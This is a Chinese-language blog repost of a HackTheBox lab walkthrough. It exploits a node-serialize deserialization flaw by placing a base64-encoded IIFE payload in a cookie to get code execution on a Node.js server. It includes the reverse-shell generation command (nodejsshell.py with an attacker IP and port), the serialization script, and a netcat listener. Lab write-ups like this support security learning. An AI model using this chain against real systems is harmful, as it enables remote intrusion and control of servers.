Nodejs反序列化漏洞利用

栏目: Node.js · 发布时间: 6年前

内容简介:目标机- Hackthebox节点机(10.10.10.85:3000)攻击者机器- Kali linux需要的工具- nodejs, npm, [nodejs工具包],node-serialize

演示环境

目标机- Hackthebox节点机(10.10.10.85:3000)

攻击者机器- Kali linux

需要的工具- nodejs, npm, [nodejs工具包],node-serialize

关于反序列化攻击

不受信任的数据被传递到 unserialize() 函数,这导致我们可以绕过 JavaScript 对象的函数表达式 IIFE 来实现任意的代码执行。首先我们在 apt-get 命令下安装nodejs包,如下所示: apt-get install nodejs

Nodejs反序列化漏洞利用

在下一步中,您需要在CURL命令下安装 npm 程序(使用npm 进一步安装 node-serialize 包),如下所示: curl -L https://www.npmjs.com/install.sh | sh

Nodejs反序列化漏洞利用

安装和配置完Nodejs和Npm之后,还要安装 node-serialize 包,输入 “ npm install node-serialize ” ,如下所示:

Nodejs反序列化漏洞利用

我们已经与HacktheBox服务器连接,其服务器的IP为10.10.10.85:3000(运行Nodejs Express Framework,您可以使用Nmap Scanning进一步确认) 。

Nodejs反序列化漏洞利用

第一步,我们使用Burp Suite捕获上述Nodejs的GET请求,如下所示:

Nodejs反序列化漏洞利用 第二步中,选择cookie值并将其发送到Decoder选项进行进一步解密。 Nodejs反序列化漏洞利用

这个漏洞在于,它从HTTP请求中读取一个名为 profilecookie 值,并对cookie值进行base64解码,并将其传递给 unserialize() 函数。所以攻击者可以构建恶意cookie值来利用这个漏洞。

Nodejs反序列化漏洞利用 第三步,您需要下载Ajin Abraham开发的Nodejs Security Toolkit工具,要安装Nodejs Security Toolkit,请在终端中键入以下命令。 git clone https://github.com/ajinabraham/Node.Js-Security-Course.git Nodejs反序列化漏洞利用 要创建一个反向shell,首先,您需要输入 “ ifconfig ”`` 找出IP ,然后运行以下命令: python nodejsshell.py 10.10.14.145 4443` Nodejs反序列化漏洞利用 这是最后反向shell payload的输出。 Nodejs反序列化漏洞利用

现在让我们使用以下javascript生成序列化的payload

代码如下

var y = {
rce : function() {}
}
var serialize = require(‘node-serialize’);
console.log(“Serialized: \n” + serialize.serialize(y));
Nodejs反序列化漏洞利用

用大括号 {    eval(String.from .........   } )添加上面的 payload 输出,如下所示:

Nodejs反序列化漏洞利用

将文件另存为 exploit.js 并使用node命令运行,该命令生成最终的序列化payload,如下所示: node exploit.js

Nodejs反序列化漏洞利用

现在回到BurpSuite,导航到Decoder选项卡,将上面的输出代码粘贴到Textarea中,解码之前,在函数体后添加IIFE方括号(),在这里,我们需要Base64的编码,然后在Cookie头值中使用编码的payload向web服务器发出请求。

Nodejs反序列化漏洞利用

然后使用Repeater发送相同的请求。

Nodejs反序列化漏洞利用

在Repeater选项中,您需要将cookie值替换为我们从上面步骤生成的base64编码值,然后单击 GO 按钮。

Nodejs反序列化漏洞利用

同时,确保你的netcat服务在相同的端口上监听,例如4443(它的反向 shell 负载端口是相同的) nc -lvp 4443

Nodejs反序列化漏洞利用

一旦你单击Go按钮,请求将命中到服务器,显示 200 OK 响应,并显示一条错误消息 “ 发生错误...无效的用户名类型 ” ,并立即在netcat终端中与该服务器连接,状态为 “ 已连接” “

Nodejs反序列化漏洞利用

以上就是本文的全部内容,希望本文的内容对大家的学习或者工作能带来一定的帮助,也希望大家多多支持 码农网

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

并行算法的设计与分析

并行算法的设计与分析

陈国良 / 2009-8 / 66.00元

第3版在修订版的基础上进行了大幅度的修订,新增加3章、重写3章,改写8章。《普通高等教育十一五国家级规划教材·并行算法的设计与分析(第3版)》系统深入地讨论了计算机领域中诸多计算问题的并行算法的设计和分析方法。在着重介绍各种并行计算模型上的常用和典型的并行算法的同时,也力图反映本学科的最新成就、学科前沿和发展趋势。 全书共分二十章,包括基础篇4章(绪论、设计技术、前缀计算、排序和选择网络),......一起来看看 《并行算法的设计与分析》 这本书的介绍吧!

RGB转16进制工具
RGB转16进制工具

RGB HEX 互转工具

图片转BASE64编码
图片转BASE64编码

在线图片转Base64编码工具

HTML 编码/解码
HTML 编码/解码

HTML 编码/解码